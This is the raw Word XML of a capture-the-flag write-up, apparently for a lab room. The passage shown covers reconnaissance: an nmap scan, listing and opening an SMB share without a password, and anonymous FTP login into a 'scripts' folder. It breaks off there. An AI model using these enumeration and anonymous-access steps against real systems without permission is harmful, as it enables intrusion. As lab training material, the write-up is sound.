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00CEF" w14:textId="3DAE7B4C" w:rsidR="00AF24ED" w:rsidRDefault="00AF24ED" w:rsidP="00AF24ED">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52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7054AC15" wp14:editId="2A912490">
            <wp:extent cx="556591" cy="556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1" cy="60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4ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Anonymous Writeup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F55536F" w14:textId="6F8CE179" w:rsidR="00054A53" w:rsidRDefault="008F662C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first </w:t>
      </w:r>
      <w:r w:rsidR="00096D38">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">thing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">I like to do when I start a new machine is to see if the server has port 80 and/or 443 open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I cop</w:t>
      </w:r>
      <w:r w:rsidR="00DE595F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> paste</w:t>
      </w:r>
      <w:r w:rsidR="00DE595F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00192068">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the room into my browser and tried both </w:t>
      </w:r>
      <w:r w:rsidR="00C609EE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00C609EE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> with no luck. </w:t>
      </w:r>
      <w:r w:rsidR="00EB52AA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Then I </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EB52AA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">thought </w:t>
      </w:r>
      <w:r w:rsidR="002B0044">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00544F13">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00544F13">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>oh</w:t>
      </w:r>
      <w:r w:rsidR="002B0044">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00544F13">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> this should be interesting!!!”</w:t>
      </w:r>
      <w:r w:rsidR="002B0044">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and fired up </w:t>
      </w:r>
      <w:r w:rsidR="00AA083E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="002B0044">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>map.</w:t>
      </w:r>
      <w:r w:rsidR="00A47B67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> The command I usually use is </w:t>
      </w:r>
      <w:r w:rsidR="00A47B67" w:rsidRPr="003E6C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A47B67" w:rsidRPr="003E6C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A47B67" w:rsidRPr="003E6C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A47B67" w:rsidRPr="003E6C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A47B67" w:rsidRPr="003E6C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A47B67" w:rsidRPr="003E6C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A47B67" w:rsidRPr="003E6C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A47B67" w:rsidRPr="003E6C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>- ”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000F29D9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFD18FA" w14:textId="3BB4CAA7" w:rsidR="000F29D9" w:rsidRDefault="000F29D9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r w:rsidR="002E3A69">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">his tells </w:t>
      </w:r>
      <w:r w:rsidR="002E3A69">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>map to scan with the default script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A14EF" w14:textId="3DFB4040" w:rsidR="000F29D9" w:rsidRDefault="000F29D9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V</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="002E3A69">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">his flag enables </w:t>
      </w:r>
      <w:r w:rsidR="00DF0FE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robing </w:t>
      </w:r>
      <w:r w:rsidR="00DF0FE8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>open ports to determine what service each open port runs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6E89B5" w14:textId="5F67F3E2" w:rsidR="00247636" w:rsidRDefault="00247636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p- = </w:t>
      </w:r>
      <w:r w:rsidR="002E3A69">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">his tells </w:t>
      </w:r>
      <w:r w:rsidR="002E3A69">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>map to scan all ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F573CA1" w14:textId="6A54235A" w:rsidR="00096D38" w:rsidRDefault="00A95937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t returned with a bunch of information as seen bellow</w:t>
      </w:r>
      <w:r w:rsidR="002B0F85">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DD1B66" w14:textId="17E7B865" w:rsidR="004B51A1" w:rsidRDefault="004537EB" w:rsidP="00544F13">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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2280078C" wp14:editId="63786833">
            <wp:extent cx="5732780" cy="35306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ACBF" w14:textId="2DDD387F" w:rsidR="004537EB" w:rsidRDefault="004537EB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t me explain what we see here:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACD1D22" w14:textId="2746FE7A" w:rsidR="004537EB" w:rsidRDefault="004537EB" w:rsidP="004537EB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rt 21 is an ftp server which allows anonymous login</w:t>
      </w:r>
      <w:r w:rsidR="00B22F7B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (interesting</w:t>
      </w:r>
      <w:r w:rsidR="001526EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>!!!</w:t>
      </w:r>
      <w:r w:rsidR="00B22F7B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC89290" w14:textId="3DB8663B" w:rsidR="004537EB" w:rsidRDefault="004537EB" w:rsidP="004537EB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rt 22 is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(not much to exploit here)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6636BE85" w14:textId="4AA23449" w:rsidR="00B22F7B" w:rsidRPr="004537EB" w:rsidRDefault="00B22F7B" w:rsidP="004537EB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rt 139 &amp; 445 run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>smb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interesting</w:t>
      </w:r>
      <w:r w:rsidR="001526EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>!!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205C3D91" w14:textId="043FA748" w:rsidR="00096D38" w:rsidRDefault="00096D38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t this stage </w:t>
      </w:r>
      <w:r w:rsidR="00AA5C08">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>some questions can be answered from the room</w:t>
      </w:r>
      <w:r w:rsidR="00815E33">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BBFD5C" w14:textId="439C859F" w:rsidR="00815E33" w:rsidRDefault="004C4A7D" w:rsidP="00815E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AD1AD9" wp14:editId="16050D2C">
            <wp:extent cx="2833365" cy="532268"/>
            <wp:effectExtent l="0" t="0" r="571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69" cy="5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4D82" w14:textId="46E1E4F5" w:rsidR="00815E33" w:rsidRDefault="003613A1" w:rsidP="00815E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03D479" wp14:editId="611A3EA3">
            <wp:extent cx="2878372" cy="7430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31" cy="7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5A80" w14:textId="3E4EF35A" w:rsidR="003613A1" w:rsidRDefault="003613A1" w:rsidP="00815E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EE721E" wp14:editId="626650A1">
            <wp:extent cx="2881343" cy="596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75" cy="6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5F76" w14:textId="25F67288" w:rsidR="00C609EE" w:rsidRDefault="00C609EE" w:rsidP="00544F13">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE22729" w14:textId="6F8B086A" w:rsidR="00C97B24" w:rsidRDefault="00221519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xt, I used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enumerate the shares of the server </w:t>
      </w:r>
      <w:r w:rsidR="00977AC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">since it has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00977AC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00977AC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and see if there is a vulnerable share that I can use.</w:t>
      </w:r>
      <w:r w:rsidR="002844DD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> The command I used for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002844DD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002844DD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="002844DD" w:rsidRPr="00D6354D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00192068" w:rsidRPr="00D6354D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00192068" w:rsidRPr="00D6354D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="003D7FD7" w:rsidRPr="00D6354D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>\\\\[IP]\\</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002844DD" w:rsidRPr="00D6354D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00DF0FE8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4506CB17" w14:textId="21EEC487" w:rsidR="00C97B24" w:rsidRDefault="00C97B24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L = This flag lists all the shares it can find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A948732" w14:textId="1E051BC3" w:rsidR="00221519" w:rsidRDefault="003D7FD7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 it turns out there is a share called </w:t>
      </w:r>
      <w:r w:rsidR="00C725AC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pics</w:t>
      </w:r>
      <w:r w:rsidR="00C725AC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> as you can see bellow</w:t>
      </w:r>
      <w:r w:rsidR="00C206F2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (don’t mind the rest shared folders)</w:t>
      </w:r>
      <w:r w:rsidR="0099229A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474F4E89" w14:textId="1EEFE8F0" w:rsidR="003D7FD7" w:rsidRDefault="00066EB1" w:rsidP="00544F1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55612" wp14:editId="0358C74E">
            <wp:extent cx="5725160" cy="205930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1B2F" w14:textId="48A77C21" w:rsidR="003D7FD7" w:rsidRDefault="00D31C5A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w the 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31C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question can be answered</w:t>
      </w:r>
      <w:r w:rsidR="00305BCE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB2637D" w14:textId="20CF6F3D" w:rsidR="009729FA" w:rsidRDefault="00C74F5C" w:rsidP="005008C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08C0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="005008C0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E57955B" wp14:editId="4CC0F69B">
            <wp:extent cx="2949068" cy="61233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4" cy="62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B2F5" w14:textId="0C7143EA" w:rsidR="00332DA6" w:rsidRDefault="0099229A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nce there is a shared </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>folder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> I wanted to try to connect to it without password and it worked!</w:t>
      </w:r>
      <w:r w:rsidR="00C97B24">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> The command I used </w:t>
      </w:r>
      <w:r w:rsidR="00AC7F19">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00AC7F19" w:rsidRPr="00FF3E66">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC7F19" w:rsidRPr="00FF3E66">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC7F19" w:rsidRPr="00FF3E66">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00392EF6" w:rsidRPr="00FF3E66">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>\\\\[IP]\\pics</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC7F19" w:rsidRPr="00FF3E66">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00392EF6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Now with the command </w:t>
      </w:r>
      <w:r w:rsidR="00392EF6" w:rsidRPr="00584660">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“ls”</w:t>
      </w:r>
      <w:r w:rsidR="00392EF6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> I can see everything there is in the folder I connected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4041C8" w14:textId="77777777" w:rsidR="00332DA6" w:rsidRDefault="00332DA6" w:rsidP="00544F1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6A0D99" wp14:editId="6E159DD3">
            <wp:extent cx="4094964" cy="818902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27" cy="8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7CD9" w14:textId="4E548A08" w:rsidR="009729FA" w:rsidRDefault="007708DF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here are 2 images</w:t>
      </w:r>
      <w:r w:rsidR="00D867B6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> hmm…</w:t>
      </w:r>
      <w:r w:rsidR="00D867B6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, I downloaded the images with the command “</w:t>
      </w:r>
      <w:r w:rsidR="00D867B6" w:rsidRPr="00FF3E66">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>get [image name]”</w:t>
      </w:r>
      <w:r w:rsidR="00FA5CDA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, the images</w:t>
      </w:r>
      <w:r w:rsidR="00AA36AA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> show</w:t>
      </w:r>
      <w:r w:rsidR="00FA5CDA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> some very cute dogs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C179112" w14:textId="2636B987" w:rsidR="007D38D6" w:rsidRDefault="00A9443A" w:rsidP="005F047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05BCCD" wp14:editId="5D7CBE03">
            <wp:extent cx="1987826" cy="13233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47" cy="13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CEAD" w14:textId="09ECAB8E" w:rsidR="007D38D6" w:rsidRDefault="00A9443A" w:rsidP="005F047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E6FA30" wp14:editId="1F6EB0AA">
            <wp:extent cx="2025818" cy="134773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43" cy="13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AA5D" w14:textId="77777777" w:rsidR="00181A51" w:rsidRDefault="00AC5EAE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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>far</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> I didn’t check one thing, there is an ftp server open with anonymous login. The command to connect is </w:t>
      </w:r>
      <w:r w:rsidRPr="001E62B7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“ftp [IP]”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> then enter “</w:t>
      </w:r>
      <w:r w:rsidRPr="001E62B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>anonymous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>” in both username and password</w:t>
      </w:r>
      <w:r w:rsidR="001E62B7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DE5E2D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inside the ftp server there is a folder called scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7636D29C" w14:textId="2AB5404C" w:rsidR="00181A51" w:rsidRDefault="004379AC" w:rsidP="00544F1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579BD5" wp14:editId="07177A23">
            <wp:extent cx="4985385" cy="88265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9220" w14:textId="4A7499A3" w:rsidR="00553210" w:rsidRDefault="005A6857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E2D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">If I go to that folder with </w:t>
      </w:r>
      <w:r w:rsidR="00DE5E2D" w:rsidRPr="00DE5E2D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“cd [folder name]”</w:t>
      </w:r>
      <w:r w:rsidR="00BA1D28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA1D28" w:rsidRPr="00BA1D28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and do</w:t>
      </w:r>
      <w:r w:rsidR="00BA1D28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA1D28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“ls”</w:t>
      </w:r>
      <w:r w:rsidR="00BA1D28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D00665">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>there are a bunch of interesting files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448873E6" w14:textId="7E63918F" w:rsidR="00553210" w:rsidRDefault="004379AC" w:rsidP="00544F1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C87B3C" wp14:editId="5C532FF4">
